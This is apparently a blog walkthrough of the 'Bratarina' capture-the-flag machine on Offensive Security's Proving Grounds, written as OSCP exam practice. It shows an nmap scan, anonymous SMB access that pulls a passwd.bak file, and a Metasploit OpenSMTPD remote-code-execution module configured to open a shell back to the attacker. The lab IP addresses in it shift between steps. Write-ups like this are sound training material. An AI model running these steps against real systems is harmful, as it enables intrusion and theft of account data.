CTFProving Grounds

Bratarina – Proving Grounds Walkthrough

Bratarina is a Linux-based machine on Offensive Security’s paid subscription, Proving Grounds Practice. Although rated as easy, the Proving Grounds community notes this as Intermediate. This box is also listed on TJ-Null’s OSCP-Like machine, which means it’s great practice for the OSCP exam. Let’s get stuck in.

We start with nmap;

sudo nmap -sC -sV -p- 192.168.171.71 -oA nmap/full

Looks simple enough. Port 22 is SSH (this is rarely the initial entry point), port 25 SMTP, 53 is DNS and 80 and 445.

Let’s start by trying to connect to SMB with null authentication;

smbclient -L 192.168.79.71

We can. So let’s log into the share;

smbclient \\\\192.168.79.71\\backups

Let’s see the contents of this share. There is one file called “passwd.bak”, which we can download locally using the ‘get’ command.

We run the “cat” command over the file to view the contents.

We see a large list of users, but really we are only interested in those that have a bash shell. Let’s grep for those entires and add these users to a text file in case we need to use them later.

Navigating to the web page on port 80, we see a CMS called FlaskBB. A quick searchsploit reveals nothing of interest here.

Moving to OpenSMTPd 2.0 on port 25, searchsploit shows us some results for remote code execution, including a couple for Metasploit. Let’s have some Metasploit fun.

Boot it up with the -q flag so we don’t get loud, spammy banners;

sudo msfconsole -q

Search for the exploit;

search opensmtpd

We can easily jump into the first exploit using and its options

use 0
options

We have to set some parameters, including LHOST, LPORT, and RHOST;

set lhost tun0
set lport 80
set rhost 192.168.157.71

And let’s run it;

run

And there we have it!

Mark

Mark like CTF's, his home lab and walks on the beach. He holds SANS certifications in Forensics and Information Security. Currently working in the cybersecurity field.
Back to top button